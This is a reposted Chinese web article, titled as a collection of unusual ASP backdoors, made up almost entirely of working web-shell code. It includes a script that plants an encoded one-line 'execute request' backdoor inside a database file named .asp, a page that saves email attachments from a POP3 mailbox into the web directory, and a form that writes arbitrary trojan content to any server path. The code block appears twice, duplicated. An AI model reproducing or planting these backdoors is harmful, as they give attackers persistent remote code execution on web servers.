几种另类的ASP后门
程序员文章站
2022-06-05 09:11:51
<% 'code by netpatch dim dbfile,sql db="netpatch.asp" db...
<%
'code by netpatch
dim dbfile,sql
db="netpatch.asp"
dbfile=server.mappath(db)
set ydb=server.createobject("adox.catalog")
ydb.create "provider=microsoft.jet.oledb.4.0;data source=" & dbfile
set ydb=nothing
if err.number=0 then
response.write dbfile & " 创建成功<br> "
else
response.write "创建失败,原因: " & err.description
response.end
end if
set conn = server.createobject("adodb.connection")
conn.open "provider=microsoft.jet.oledb.4.0; data source=" & dbfile
sql="create table fdata([data] memo)"
conn.execute(sql)
set rs = createobject("adodb.recordset")
rs.open "fdata", conn, 1, 3
rs.addnew
rs("data")="┼攠數畣整爠煥敵瑳∨≮┩>" '(注释记得去掉!一句话后门 execute request(“n”))
rs.update
%>
用jmail写文件进硬盘
<%
'codz by kevin1986 [s4t]
user=request.form("user")
pass=request.form("pass")
popserver=request.form("popserver")
if user<>"" and pass<>"" and popserver<>"" then
set objmail = createobject( "jmail.pop3" )
objmail.connect user, pass, popserver
set objmsg=createobject("jmail.message")
set objmsg = objmail.messages.item(1)
separator = ", "
response.write "attachment name is: " & saveatta & "<br>"
objmail.disconnect
end if
function saveatta()
set attachments = objmsg.attachments
separator = ", "
response.write "the size of this attachment is: " & objmsg.size & "<br>"
for i = 0 to attachments.count - 1
if i = attachments.count - 1 then
separator = ""
end if
set theatta = attachments(i)
response.write theatta.name
theatta.savetofile(server.mappath(".") & "\" & theatta.name)
response.write "oh!hey guy.....that's ok!"
next
end function
%>
<html>
<head>
<title>jmail save file shell</title>
</head>
<body>
<center>
<form method="post">
user: <input name="user" type=text value="kevin1986"><br>
pass: <input name="pass" type=text value="1986lovinghuan"><br>
pop3: <input name="popserver" type=text value="pop.163.com"><br>
<input type=submit value="get the attachments of the first mail">
</form>
</center>
</body>
</html>
利用xml写马
<%on error resume next%>
<form id="form1" name="form1" method="post" action=''''>
<p>木马内容</p>
<p><textarea name="flashboy" cols="80" rows="10"></textarea></p>
<p>路径</p>
<p><input name="textfield" type="text" size="50" /></p>
<p><input type="submit" name="submit" value="提交" /></p></form>
<p><%response.write "本文件绝对路径"%>
<%=server.mappath(request.servervariables("script_name"))%></p>
<%
dim xmlstring
dim xmldoc
xmlstring= request("flashboy")
set xmldoc = server.createobject("msxml2.domdocument")
xmldoc.loadxml(xmlstring)
f=request("textfield")
xmldoc.save(f)
set xmldoc=nothing
%>
'code by netpatch
dim dbfile,sql
db="netpatch.asp"
dbfile=server.mappath(db)
set ydb=server.createobject("adox.catalog")
ydb.create "provider=microsoft.jet.oledb.4.0;data source=" & dbfile
set ydb=nothing
if err.number=0 then
response.write dbfile & " 创建成功<br> "
else
response.write "创建失败,原因: " & err.description
response.end
end if
set conn = server.createobject("adodb.connection")
conn.open "provider=microsoft.jet.oledb.4.0; data source=" & dbfile
sql="create table fdata([data] memo)"
conn.execute(sql)
set rs = createobject("adodb.recordset")
rs.open "fdata", conn, 1, 3
rs.addnew
rs("data")="┼攠數畣整爠煥敵瑳∨≮┩>" '(注释记得去掉!一句话后门 execute request(“n”))
rs.update
%>
用jmail写文件进硬盘
<%
'codz by kevin1986 [s4t]
user=request.form("user")
pass=request.form("pass")
popserver=request.form("popserver")
if user<>"" and pass<>"" and popserver<>"" then
set objmail = createobject( "jmail.pop3" )
objmail.connect user, pass, popserver
set objmsg=createobject("jmail.message")
set objmsg = objmail.messages.item(1)
separator = ", "
response.write "attachment name is: " & saveatta & "<br>"
objmail.disconnect
end if
function saveatta()
set attachments = objmsg.attachments
separator = ", "
response.write "the size of this attachment is: " & objmsg.size & "<br>"
for i = 0 to attachments.count - 1
if i = attachments.count - 1 then
separator = ""
end if
set theatta = attachments(i)
response.write theatta.name
theatta.savetofile(server.mappath(".") & "\" & theatta.name)
response.write "oh!hey guy.....that's ok!"
next
end function
%>
<html>
<head>
<title>jmail save file shell</title>
</head>
<body>
<center>
<form method="post">
user: <input name="user" type=text value="kevin1986"><br>
pass: <input name="pass" type=text value="1986lovinghuan"><br>
pop3: <input name="popserver" type=text value="pop.163.com"><br>
<input type=submit value="get the attachments of the first mail">
</form>
</center>
</body>
</html>
利用xml写马
<%on error resume next%>
<form id="form1" name="form1" method="post" action=''''>
<p>木马内容</p>
<p><textarea name="flashboy" cols="80" rows="10"></textarea></p>
<p>路径</p>
<p><input name="textfield" type="text" size="50" /></p>
<p><input type="submit" name="submit" value="提交" /></p></form>
<p><%response.write "本文件绝对路径"%>
<%=server.mappath(request.servervariables("script_name"))%></p>
<%
dim xmlstring
dim xmldoc
xmlstring= request("flashboy")
set xmldoc = server.createobject("msxml2.domdocument")
xmldoc.loadxml(xmlstring)
f=request("textfield")
xmldoc.save(f)
set xmldoc=nothing
%>
上一篇: 红糖的坏处你都知道吗